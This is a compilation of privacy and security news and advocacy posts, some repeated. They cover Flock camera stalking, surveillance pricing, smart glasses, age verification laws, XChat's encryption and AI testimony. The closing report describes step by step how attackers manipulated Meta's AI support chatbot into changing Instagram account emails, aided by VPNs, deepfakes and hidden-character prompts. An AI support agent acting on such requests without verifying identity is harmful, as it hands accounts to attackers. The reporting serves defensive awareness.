Flock Cameras Are Being Used for Stalking
There are over a dozen cases around the country where police officers are using the Flock surveillance camera system to obsessively and illegally stalk people.
There are over a dozen cases around the country where police officers are using the Flock surveillance camera system to obsessively and illegally stalk people.
LGBTQ+ communities are facing an escalating wave of censorship and targeted surveillance, but we can push back through mutual solidarity. Join us live to learn how safer virtual spaces get built, how platform policies and government pressure are reshaping the digital landscape, and what platform accountability actually looks like. Our panel will share ideas for direct action and concrete strategies you can bring back to your community. Whether you’re an activist, an ally, or just paying attention, this conversation is for you. Join the livestream online followed by live Q&A.
Paige Collings
As a lawyer, digital policy activist and community organizer, Paige works to dismantle systems of oppression and advance collective liberation. Her work focuses on highlighting how state surveillance and corporate restrictions stifle marginalized communities and perpetuate historic injustices and harm. She has worked with activists across the globe to facilitate systemic change by speaking truth to power and creating spaces for alternative imaginations; and her writing on digital justice has been featured in Wired, Politico, Teen Vogue, the Daily Beast and more.
Jillian C. York
Jillian is EFF's Director for International Freedom of Expression, based in London. Her work examines state and corporate censorship and its impact on culture and human rights, with a focus on historically marginalized communities. At EFF, she organizes coalitions, writes about and researches topics related to freedom of expression, leads the Speaking Freely interview series, and contributes to various other areas of the organization's work. Jillian is the author of Silicon Values: The Future of Free Speech Under Surveillance Capitalism (Verso, 2021), a contributor to several academic volumes, and has written for MIT Technology Review, The Guardian, and WIRED, among others. She is also a visiting professor at the College of Europe Natolin in Warsaw, and a regular speaker at global events.
Soatok Dreamseeker
Soatok Dreamseeker is a gay furry security engineer. He blogs about applied cryptography on his blog, Dhole Moments, and is developing key transparency to enable end-to-end encryption on the Fediverse. His puns are 100% whole groan.
Luísa Franco Machado
Luísa Franco Machado is an award-winning international expert in digital rights and data justice. She has also been a technical advisor in data governance and AI ethics for governments, NGOs, and international organizations worldwide, including the UN, OECD.AI, GIZ, and others. Luísa has carried on policy research at the London School of Economics and Political Science (LSE) and Sciences Po Paris on the intersection between technology and socio-economic development. In 2022, the United Nations recognized them as a global Young Leader for the Sustainable Development Goals (SDGs) among more than 6,500 advocates. In 2025 she was featured in Apolitical's Government AI 100 list as a rising star.

A proposed FCC rule would kill burner phones: phones whose accounts are not attached to a particular person.
The FCC plans to do this by legally forcing the country’s telecoms to store a wealth of personal information about essentially all phone customers, including a government issued identification number and their physical address, alarming privacy advocates and civil rights activists who compare the measures to those from authoritarian countries where it can be difficult to buy a mobile phone plan without giving up your identity.
The proposed change would drastically shake up how people obtain phone plans in the U.S., and have all sorts of privacy and cybersecurity knock-on effects. The FCC is proposing the data collection partly as a way to combat scammers, with telecoms being required to collect other information on business and foreign customers like the intended use case of their bulk phone plan purchase and their IP address. But the changes would mean telecoms collect data on all new and renewing customers, and the FCC provides a long list of other things that the collected data could help authorities with.
Corporations harvest and monetize ever-growing amounts of our personal data, such as our browsing history and physical location. One bitter fruit of this poisonous tree is known as “surveillance pricing”: corporations offer the same product to two different people at two different prices, based on scrutiny of these people’s respective personal data.
Surveillance pricing is bad for privacy, equity, and price transparency. So EFF supports a California bill, S.B. 2564, which would ban this creepy practice.
In 2025, the Federal Trade Commission (FTC) published a report about the practices of six companies that provide surveillance pricing services to hundreds of other companies, including grocery stores and apparel retailers. The report found that surveillance pricing draws upon customers’ browsing history, physical location, and shopping transaction history. Customers’ data can come from the vendor itself, from its surveillance pricing service provider, or from third-party data brokers. Customers are sorted into groups based on their personal data, as is done for targeted ads. As a result of surveillance pricing, a business might offer two customers different prices for the same product, based for example on whether they are a new parent, or whether they live near a business’s competitor.
As former FTC Chair Lina Khan explained:
Initial staff findings show that retailers frequently use people’s personal information to set targeted, tailored prices for goods and services – from a person’s location and demographics, down to their mouse movements on a webpage.
Unfortunately, the current FTC chair closed the FTC’s portal for public comments regarding surveillance pricing. Fortunately, the California Attorney General has initiated its own investigation of this practice.
Researchers have identified many examples of surveillance pricing:
This practice is harmful in many ways. First, surveillance pricing invades our privacy. Vendors offer us a price only after scrutinizing our personal data about what we’ve clicked online and where we’ve travelled offline. Moreover, surveillance pricing incentivizes all businesses to harvest as much of our personal data as possible. Some businesses will use it for their own surveillance pricing. Other businesses, which might not themselves use it this way, will sell it to data brokers, which in turn will sell it to others for use in surveillance pricing.
Second, surveillance pricing can disparately burden people of color and other vulnerable groups. For example, as described above, surveillance pricing led to Asian people paying more for test prep services, older people paying more for dating services, and people living in non-white neighborhoods paying more for a ride home.
Third, surveillance pricing is opaque. Many people don’t even know when they’ve been subjected to it. Those that do often cannot determine the unknown reasons for the price they’re offered. As a result, consumer advocates will be less able to publish meaningful price comparisons to help consumers make choices. And regulators will be less able to identify unlawful pricing practices.
Thus, EFF and many other groups object to surveillance pricing.
Its defenders sometimes argue that surveillance pricing benefits consumers because it can lead to lower prices. But while some consumers some of the time might get lower prices because of surveillance of their personal data, other consumers will get higher prices, as shown by the examples above. Some recent studies indicate there will be losers and winners based on factors like whether a consumer is willing or able to switch products. Who loses or wins also will turn on the accuracy of the underlying data – yet surveillance pricing is often based on false information.
In any event, both losers and winners of this price discrimination are harmed by surveillance. Privacy is a human right, not a property to be bought and sold on a market. For this reason, EFF has long opposed pay-for-privacy schemes, in which a company charges a higher price to a customer who refuses to submit to processing of their personal data. Thus, even if surveillance pricing sometimes leads to lower prices (and again, it often will not), we oppose it as just another way that corporations try to make customers pay for their privacy.
The key term of California’s S.B. 2564 is short and sweet: “a retailer shall not engage in surveillance pricing.”
The banned practice is defined as: “[i] a customized price for a good for a specific consumer or group of consumers, [ii] based, in whole or in part, on personally identifiable information collected through electronic surveillance,” including if that information is “acquired from a third party.” In other words, “surveillance pricing” is a customized price based on personal information.
The bill has two enforcement methods. First, state and local government may bring enforcement actions, and seek all manner of remedies including monetary penalties. Second, individual consumers may bring their own enforcements lawsuits, and seek the remedies of an injunction and attorney fees. We are pleased the bill provides this private right of action, which is the most important method of enforcement (we’d be even more pleased if the private remedies included liquidated damages).
The bill has three exemptions where surveillance pricing is allowed:
The bill’s author is California Assembly Member Chris Ward. Its co-sponsors are Consumer Reports and TechEquity. Its supporters include Consumer Federation, EPIC, Kapor Center Advocacy, Oakland Privacy, Privacy Rights Clearinghouse, labor unions, and other groups. The bill has advanced through the California Assembly and has arrived for consideration in the California Senate.
Surveillance pricing is just one part of a much larger problem: corporations maximizing their profits by invading our privacy. The all-too-common business model is to systematically harvest, collate, and store as much of our personal data as possible, and then monetize it through use and sale.
EFF’s general approach to this problem is a strong regulatory framework that we call “privacy first.” For example, laws should require businesses to “minimize” their data processing, meaning they must not collect, store, use, or disclose our data unless doing so is strictly necessary to give us what we asked for. Likewise, laws should require businesses to get our voluntary and informed opt-in consent before processing our data, buttressed by legal bans on coercive pay-for-privacy schemes and manipulative “dark patterns.”
A.B. 2564 is just a specific application of the minimization rule. Nobody who uses a web browser or a mobile app expects that, as a result, their clicks and footsteps will be funneled into personal dossiers, and later used by downstream businesses to offer a higher or lower price.
A.B. 2564 is also a specific application of the “no pay-for-privacy” rule. At its best, surveillance pricing is a corporate offer of a lower price in exchange for a consumer’s submission to surveillance of their personal data. This scheme encourages all people to surrender their privacy in exchange for a lower price. This is especially coercive for people with lower incomes, and thus carries the risk of creating a society of privacy “haves” and “have nots.” And swept into this supposed “bargain” is the potential for higher surveillance-based prices based on false information or erroneous inferences.
Surveillance pricing is very similar to online behavioral advertising, a business practice that EFF urges governments to ban. Both practices incentivize all businesses to collect as much of our personal data as possible, in order to later monetize it. Both practices lead some businesses to collate and store our data into dossiers about us for later use. Both practices use these surveillance-based dossiers to manipulate and limit our economic choices, by altering the advertisements and prices we see online. In the words of the FTC report discussed above: “Existing and common techniques used for targeted advertising can also be used for other forms of targeting prices.”
Absent a specific ban on surveillance pricing, as in A.B. 2564, it would be very difficult to protect the public from the many harms it causes. Corporate price-setting is increasingly opaque, making it difficult for consumers and regulators to determine whether a particular company set a particular price for a particular consumer based on their data, and if so, the particular data that it used. As a result, it would be very difficult in this context to enforce general laws requiring minimization or consent. Moreover, many such laws exempt how a business processes the data it directly collected from its own customers; for example, the California Consumer Privacy Act’s limits on “cross-context behavioral advertising” do not apply to how a business uses personal data it collected on its own website. Yet many practitioners of surveillance pricing (like Tindr) rely on such data.
Finally, there is little to no risk that A.B. 2564 will have unintended consequences that hurt internet users’ speech or technological innovation. The bill does not address any particular type of technology. It does not limit any collection, retention, or disclosure of personal data. It limits only one very narrow and easily defined use of data: use to set a customized price. And it has three broad exemptions.
In sum, EFF is proud to join with other groups in support of California’s A.B. 2564. You can read our support letter here.

Last June during Pride, we launched a new initiative—LGBT Q&A—where we answered your most pressing queer-related digital rights questions on EFF’s Instagram and TikTok accounts. No question was too big or too small! You asked us things like what pictures to use on dating apps; how to remove your name from internet searches; why homophobic content doesn't get removed after you report it; and how to stay safe at Pride marches.
And this year, we’re doing it all again.
Both online and offline, LGBTQ+ individuals and the fight for queer liberation are under threat; and the need for guidance and protection from prying eyes and oppressive structures is increasingly pertinent. This is particularly true for those of us who face consequences when intimate details around gender or sexual identities are revealed without consent.
But we know that it can feel overwhelming to even start thinking about how you can protect yourself online in the face of these issues. That's why this Pride, we’re answering all your digital rights questions.
How to submit your questions?
As always, we will not engage with comments that discriminate against marginalized groups, including the LGBTQ+ community.
We’re here to help build an online space where you get to decide what aspects of yourself you share with others, how you present to the world, and what things you keep private. Join us to make the internet private, safe, and full of pride.

Meta’s smart glasses are once again at the center of a privacy debate due to face recognition.
WIRED reports that Meta had quietly embedded unreleased face-recognition code, internally called “NameTag,” into its Meta AI companion app, which powers the company’s smart glasses. The code was not active, but its presence in an app installed on more than 50 million devices raised immediate concerns about how quickly using smart glasses could slide into biometric surveillance.
Face recognition in glasses, even if disabled or unreleased, is especially sensitive because it can identify people at a distance, in real time, and without their consent. Many organizations have warned that this technology could be misused by stalkers, abusers, and others who want to identify people in public without drawing attention.
Gizmodo reports on a proposed Pennsylvania bill that would require smart glasses and similar wearable recording devices to include a visible indicator light when they are capturing audio or video. The bill would also prohibit users from disabling that indicator, a move clearly aimed at reducing covert recording in public spaces.
Most smart glasses already include such an indicator, but reporters noted that some users have been paying others to have them removed or disabled. The proposal is interesting because it tries to solve a hardware-level trust problem with a visible signal. But a visible light only helps if it is both mandatory and difficult to bypass, and history suggests that any visible privacy safeguard becomes a target for tampering when the incentives are high enough.
These two stories are really about the same issue: smart glasses are normalizing the use of always-on cameras, microphones, and AI features in a form that is much easier to conceal than a phone. That creates an unwanted privacy problem for people around the wearer.
Smart glasses are supposed to make computing more seamless. Instead, they are becoming a test case for what happens when cameras, microphones, AI, and biometric features are squeezed into everyday wearables before the privacy rules catch up.
From our point of view, smart glasses sit at the intersection of consumer privacy, surveillance tech, and potential abuse. The risk is not just that a device records audio or video. AI-enabled wearables can process what they see, deduce identities, and potentially store biometric data in ways that ordinary users and bystanders can’t easily detect.
We’d rather err on the side of caution and use an app that can detect when smart glasses are nearby. Unfortunately, it only detects some devices, and we don’t yet know how well it will perform if smart glasses become more common.
As noted by 404 Media, the app is an imperfect, tech-based response to a social and legal problem: it can misfire, it can’t tell you who is being recorded, and it risks giving a false sense of safety. The developer frames it not as a solution but as a small, user-controlled countermeasure in an environment where surveillance devices are becoming less visible and more AI-enabled.
If facial recognition features ever become common in smart glasses, much of their effectiveness will depend on how much information about you is already available online. There are a few steps you can take today to reduce your visibility in facial recognition systems and people-search databases.
A major factor is limiting who can see the photographs you post on social media and other online platforms. But there is more you can do:
The major, most accurate reverse face search engines, Pimeyes and Facecheck.id, offer opt-out and removal processes that can help reduce your visibility in search results:
Most people don’t realize how much information can be found from a name alone. People-search sites often aggregate home addresses, phone numbers, ages, and relatives from public records and commercial databases.
The New York Times has compiled a useful guide to many of the major people-search sites, along with instructions for opting out and removing your information.
If you’re in the US, you can also use Malwarebytes Personal Data Remover to help find and remove personal information that data broker sites have collected about you.
Meta’s smart glasses are once again at the center of a privacy debate due to face recognition.
WIRED reports that Meta had quietly embedded unreleased face-recognition code, internally called “NameTag,” into its Meta AI companion app, which powers the company’s smart glasses. The code was not active, but its presence in an app installed on more than 50 million devices raised immediate concerns about how quickly using smart glasses could slide into biometric surveillance.
Face recognition in glasses, even if disabled or unreleased, is especially sensitive because it can identify people at a distance, in real time, and without their consent. Many organizations have warned that this technology could be misused by stalkers, abusers, and others who want to identify people in public without drawing attention.
Gizmodo reports on a proposed Pennsylvania bill that would require smart glasses and similar wearable recording devices to include a visible indicator light when they are capturing audio or video. The bill would also prohibit users from disabling that indicator, a move clearly aimed at reducing covert recording in public spaces.
Most smart glasses already include such an indicator, but reporters noted that some users have been paying others to have them removed or disabled. The proposal is interesting because it tries to solve a hardware-level trust problem with a visible signal. But a visible light only helps if it is both mandatory and difficult to bypass, and history suggests that any visible privacy safeguard becomes a target for tampering when the incentives are high enough.
These two stories are really about the same issue: smart glasses are normalizing the use of always-on cameras, microphones, and AI features in a form that is much easier to conceal than a phone. That creates an unwanted privacy problem for people around the wearer.
Smart glasses are supposed to make computing more seamless. Instead, they are becoming a test case for what happens when cameras, microphones, AI, and biometric features are squeezed into everyday wearables before the privacy rules catch up.
From our point of view, smart glasses sit at the intersection of consumer privacy, surveillance tech, and potential abuse. The risk is not just that a device records audio or video. AI-enabled wearables can process what they see, deduce identities, and potentially store biometric data in ways that ordinary users and bystanders can’t easily detect.
We’d rather err on the side of caution and use an app that can detect when smart glasses are nearby. Unfortunately, it only detects some devices, and we don’t yet know how well it will perform if smart glasses become more common.
As noted by 404 Media, the app is an imperfect, tech-based response to a social and legal problem: it can misfire, it can’t tell you who is being recorded, and it risks giving a false sense of safety. The developer frames it not as a solution but as a small, user-controlled countermeasure in an environment where surveillance devices are becoming less visible and more AI-enabled.
If facial recognition features ever become common in smart glasses, much of their effectiveness will depend on how much information about you is already available online. There are a few steps you can take today to reduce your visibility in facial recognition systems and people-search databases.
A major factor is limiting who can see the photographs you post on social media and other online platforms. But there is more you can do:
The major, most accurate reverse face search engines, Pimeyes and Facecheck.id, offer opt-out and removal processes that can help reduce your visibility in search results:
Most people don’t realize how much information can be found from a name alone. People-search sites often aggregate home addresses, phone numbers, ages, and relatives from public records and commercial databases.
The New York Times has compiled a useful guide to many of the major people-search sites, along with instructions for opting out and removing your information.
If you’re in the US, you can also use Malwarebytes Personal Data Remover to help find and remove personal information that data broker sites have collected about you.
The internet is an essential resource for young people and adults to access information, explore community, and find themselves—both inside countries and across continents. Yet governments around the world continue to introduce and implement legislation requiring all online users to verify their ages before accessing the digital space. In some cases, politicians are going further, putting forth proposals to ban social media for younger users.
In late 2025, Australia’s government rolled out the first complete ban on users under 16 from having social media accounts. In this sweeping regime, platforms are required to introduce age assurance tools to block under-16s, demonstrate that they have taken “reasonable steps” to deactivate accounts used by under-16s, and prevent any new accounts being created, or face fines of up to 49.5 million Australian dollars ($32 million USD). The 10 banned platforms—Instagram, Facebook, Threads, Snapchat, YouTube, TikTok, Kick, Reddit, Twitch, and X—have each said they’ll comply with the legislation, which led to young people losing access to their accounts overnight. Reddit is currently challenging the law in Australian courts on constitutional grounds. Recent research notes how the ban is preventing teenagers from accessing news in the country.
In the United Kingdom, rules took effect in mid-2025 under the Online Safety Act that require all online services available in the country to assess whether they host content considered harmful to children; if so, these services must introduce age checks to prevent children from accessing such content. Online services are also required to change their algorithms and moderation systems to ensure that content defined as harmful, like violent imagery, is not shown to young people.
This approach is reckless, short-sighted, and we’ve already seen it introduce more harm to the young people that it is trying to protect. The UK’s scramble to find an effective age verification method shows us that there isn't one, and we’ve spent years urging UK politicians to abandon any measures that require platforms to collect data or remove privacy protections around users’ identities.
Earlier this year, Indonesia’s Communications and Digital Affairs Minister, Meutya Hafid, announced that users under 16 would have their accounts on “high risk” platforms deactivated from 28 March. The platforms subject to this ban are YouTube, TikTok, Facebook, Instagram, Threads, X, Bigo Live, and Roblox; with Hafid noting how this policy would make Indonesia “the first non-Western country to delay children's access to digital spaces according to age.”
Similarly, the Malaysian government has recently pushed forward with plans to ban users under 16 from having accounts on social media platforms with at least 8 million users in Malaysia, including Facebook, Instagram, TikTok, and YouTube. Users under the age of 16 are being told to download or transfer their data from these platforms in one month before the restrictions are applied. Platforms failing to comply with the ban may face penalties of up to $2.5 million USD.
In Latin America, Brazil approved a new law in 2025 establishing that providers of information technology products and services directed to children and teenagers, or likely to be accessed by them, must conduct age checks when their products and services offer risks to underage users. Regulation requires age assurance for products and services that are not allowed for children and adolescents in accordance with Brazilian legislation. App stores and operating systems are required to provide age signals for other providers.
While the law is already in force, full compliance with its obligations is expected for early 2027, after the approval of further regulations and a transition period, and the authority responsible for enforcing the law is the Brazilian National Data Protection Agency. The list of concerns regarding the implementation of the law include: the wide scope of products and services that may fall within age-check obligations, how these obligations can affect non-proprietary operating systems and free software projects, and how effective the law's crucial data protection safeguards will be in a context of likely widespread age checks for accessing content online.
Similarly, the European Union has taken large steps towards mandatory age verification that could undermine privacy, expression, and participation rights for everyone. Politicians are promoting an EU-wide approach to age verification through its age verification “app,” which will be fully interoperable with the Digital Identity Wallet. While this mini-app has been announced as technically ready to be rolled out “for citizens to use,” it comes with its own realm of potential privacy and security concerns, such as long-term identifiers (which could result in tracking) and over-exposure of personal information.
The European Commission also supports age verification in various legislative initiatives, from proposals that would allow or mandate companies to scan our communication (“Chat Control”) to non-binding guidelines of existing laws, such as the Digital Services Act. The EU Parliament, too, has proposed an EU digital minimum age of 16 for access to social media, a move that aligns with EU Commission’s president Ursula von der Leyen’s recent public support for measures inspired by Australia’s model. To all these initiatives EFF has provided one consistent response: mandatory age verification measures are not the right way to protect young people.
These proposals restrict the fundamental rights of young people to speak to each other and to access information. They also force all internet users, not just those under a certain age, to upload private data—like a face scan or passport—in order to access a website or service. In considering the vast scope of privacy issues pertaining to the collection, storage, and sharing of this personal information, the problems of age verification in restricting free speech are compounded by these reckless and harmful approaches to verification.
The problem of censorship and surveillance goes far beyond the borders of the internet. EFF continues to explore support for legislative and litigation challenges that recognize how these laws harm everyone’s rights to privacy, free expression and due process.

Last year during LGBTQ+ Pride month, we launched an LGBT Q&A where we answered your most pressing digital rights questions on EFF’s Instagram and TikTok accounts.
Ahead of LGBT Q&A Season 2 launching next week, we’re posting a recap with some of the questions we answered. Check them out below.
We’re here to help build an online space where you get to decide what aspects of yourself you share with others, how you present to the world, and what things you keep private. Join us to make the internet private, safe, and full of pride.


Pavel Durov and his “private” messaging app have a brand new rival, and it’s — drumroll, please — Elon Musk and his XChat. On our blog, we’ve discussed more than once why Durov’s claims about Telegram privacy and security are exaggerated, to put it mildly. Here, I’ll just remind the reader that standard (non-secret) chats on Telegram aren’t protected by end-to-end encryption — the bare minimum required for user data to stay private.
But let’s get back to Musk. In late April 2026, the XChat app launched for iOS users. The tech mogul had been touting his messaging app for a long time, pitching it from day one as an incredibly private and secure way to communicate, and as a direct threat to Signal, WhatsApp, Telegram, and iMessage. Today, we look at whether we should actually trust Musk’s promises this new service, break down its core features, and stack it up against the competition.
Musk initially teased XChat on June 1, 2025, naturally via his X (formerly Twitter) account. Responding to another user’s question about when to expect the new service, Musk wrote: “This week if there are no scaling issues.”
Apparently, scaling issues there were: the app’s beta didn’t drop until September 2025, and iOS users didn’t get full access until April 2026. As for Android, there is zero info on when that version would launch at the time of this writing. That said, an XChat page is already live on Google Play where users can queue up “pre-register”, whatever that means.
But let’s go back to Musk’s post announcing XChat. That specific post turned a lot of heads in the privacy and cybersecurity community, and here’s why: the tech mogul wrote that the service would be built on an “entirely new architecture”, written in Rust, and featuring “Bitcoin-style encryption”.
Elon Musk announces the launch of XChat, claiming the new messaging app is written in Rust and uses “Bitcoin-style encryption”. Source
The expert community spent a long time scratching their heads and trying to figure out what Musk actually meant. After all, Bitcoin isn’t an anonymous, encrypted data exchange system. The blockchain does use public and private cryptographic keys, but for something entirely different: signing transactions. Meanwhile, these transactions aren’t hidden from prying eyes; they’re out in the open for anyone to see, forever. Simply put, Bitcoin protects its users not by ensuring privacy, but quite the opposite — through ultimate transparency.
Most likely, Musk used “Bitcoin-style encryption” as a marketing gimmick. Bitcoin was trading near all-time highs at the time of his announcement, and cryptocurrency was the talk of the town. Technically, the XChat beta that dropped in September 2025 protected user chats with a “kind of” end-to-end encryption, but this was implemented in a way that raised serious doubts among cryptography experts.
And not without a reason. Normally, setting up an end-to-end encrypted chat automatically generates a public and private key pair. The public key is used to encrypt messages, while the private key decrypts them. Because other users need your public key to start a secure chat with you, these keys are usually stored on the app’s servers.
The private key, however, should ideally live only on the user’s device — which is exactly how Signal does it. This serves as a simple, ironclad guarantee that neither the company itself nor any third party breaching its infrastructure can access user chats, even if they really want to.
But Elon Musk’s projects always march to the beat of their own drum: the XChat developers decided it would be a great idea to store users’ private keys on XChat servers. X claims they’ll use hardware security modules (HSMs) to store these private keys — specialized appliances designed to prevent even the system owner from easily accessing the data inside. However, experts are also questioning the reliability of this setup, and coming to a grim conclusion: if X really wants to get a user’s private key, they will most likely be able to do so.
Finally, once the scaling issues were ironed out nearly a year after the announcement, X officially rolled out the XChat app for iOS in April 2026. Now anyone can use it, but from a practical standpoint, the situation with encrypted chats seems even more convoluted than in Telegram.
According to the social network’s help center, to use end-to-end chat encryption in XChat, both users must have an X account, set up XChat, and have some sort of connection between them:
If users don’t follow each other and haven’t interacted before, XChat might still let them send a message request. However, that initial request goes out without end-to-end encryption.
Again, this is how the process is described in the messaging app’s official help documentation. Sound overly complicated? Let me reassure you: in practice, it works — or rather, doesn’t — completely differently. I personally managed to send a message to another user who had NOT set up XChat. The app itself, of course, gave me absolutely no warning about this.
The app allows you to start a chat with a user who hasn’t even set up XChat yet, without giving the sender any heads-up.
It gets even better. The user I messaged saw a notification for it on the web version of X, but couldn’t actually access the message. Here’s the catch: to start using XChat, the user first has to create a four-digit PIN. Yet, the app asks for this PIN the very first time the user tries to open it — meaning, before they even get a chance to create one. Along with this prompt, the user also sees a warning stating that without the PIN, they won’t be able to view past encrypted chats.
The user is prompted to enter a PIN to decrypt past messages before even completing the initial XChat setup.
The only workaround I found to actually start using XChat is to tap “Forgot PIN?” — even though that PIN never existed in the first place — confirm your identity, and create a new (well, your first) PIN. Naturally, you lose access to your chat history this way, so you won’t be able to read any messages sent to you in XChat before you officially set up the app.
All these PIN hurdles actually exist for a reason. Remember, unlike WhatsApp and Signal, the XChat developers decided to store users’ private keys on their own servers. Consequently, the app uses these four-digit PINs to encrypt those keys.
According to the XChat help documentation, this mechanism was designed to ensure a “seamless” multi-device experience. It’s impossible not to point out that both WhatsApp and Signal managed to pull this off without sketchy workarounds like PIN requirements or server-side private key storage.
The problem is, workarounds like these undermine any claims of app privacy and security. First and chief among them, a PIN isn’t exactly the most secure way to protect sensitive data. We’ve mentioned time and again that four-digit combinations are easy to crack via brute force — especially since XChat gives you a generous 20 attempts to guess the right code.
The app allows up to 20 attempts to enter the four-digit PIN. Once the limit is reached, XChat warns that access to messages will be permanently lost.
Stepping away from the bizarre implementation of end-to-end encryption compared to other messaging apps, it’s hard to ignore the overall sense of pointlessness that comes with trying to use XChat. As a Wired journalist rightly pointed out, the app feels less like a relative of WhatsApp, Signal, or Telegram, and much more like Facebook Messenger. Except people usually open Messenger to read a text from their mom or grandma, whereas XChat seems meant for anyone wanting to check in on that weird nephew who spends all his free time on X, still believes John McAfee’s promise of $500 000 Bitcoin, and fanboys over Elon Musk.
The best way to wrap up this post is with a quote from a cybersecurity expert: “If what you want is good security, use Signal. If what you want is to be able to talk to pretty much anybody using encrypted messages, use WhatsApp. If your whole life is based around X, I guess this is better than nothing.”
If you do use XChat, rule number one is to avoid a predictable PIN — absolutely don’t use your birth year or, worse, 1234. It’s also crucial not to forget this code, because if you do, your entire chat history is gone for good. Finally, just like your other passwords, you shouldn’t keep it in your notes app, but rather in a secure password manager. This won’t only save you from having to memorize dozens of character combinations, but will also reduce the risk of losing access to your vital data and conversations.
To learn more about secure messaging in other apps, check out our other posts:




Governments must not adopt emerging and powerful AI technologies without also adopting strong and clear safeguards to protect Constitutional rights, EFF Senior Policy Analyst Dr. Matthew Guariglia testified today to the House Homeland Security Subcommittee on Cybersecurity and Infrastructure Protection.
During the hearing on “The AI Security Landscape: How Frontier Models, Agentic AI, and AI Coding Tools Are Reshaping Cybersecurity and Critical Infrastructure Resilience,” he explained that the use of generative AI for the purposes of mass government surveillance would supercharge unconstitutional violations of civil liberties. He also highlighted how government secrecy, in addition to the black box of for-profit proprietary technology, prevents the public and lawmakers from knowing when AI models make mistakes, including errors that seriously impact the cybersecurity of critical infrastructure and the lives of individuals.
“AI also has a track record of getting things wrong—from false citations on legal briefs to a major AI mistake that sent DHS recruits to the field without proper training. There are likely more consequential examples that we do not even know about because of classification that would prevent a more thorough accounting," he said in his opening remarks.
“At this level the question is not how do we rein in AI, it’s how do we rein in the agencies that would unleash AI on the American public,” Matthew said in response to a question by Subcommittee Ranking Member Delia Ramirez, D-Ill.
You can read his full testimony as prepared here.

Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.
Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.
The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.
Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.
To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.
In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.
Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.
The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.
Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.
Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.
Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.
A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.
That doesn’t make MFA perfect, but it adds an important layer of protection.
So the practical advice is unglamorous:
Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.
This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.
The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.
Scammers don’t need to hack you. They just need you to click once.
Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.
Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.
Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.
The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.
Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.
To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.
In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.
Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.
The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.
Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.
Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.
Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.
A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.
That doesn’t make MFA perfect, but it adds an important layer of protection.
So the practical advice is unglamorous:
Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.
This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.
The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.
Scammers don’t need to hack you. They just need you to click once.
Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.
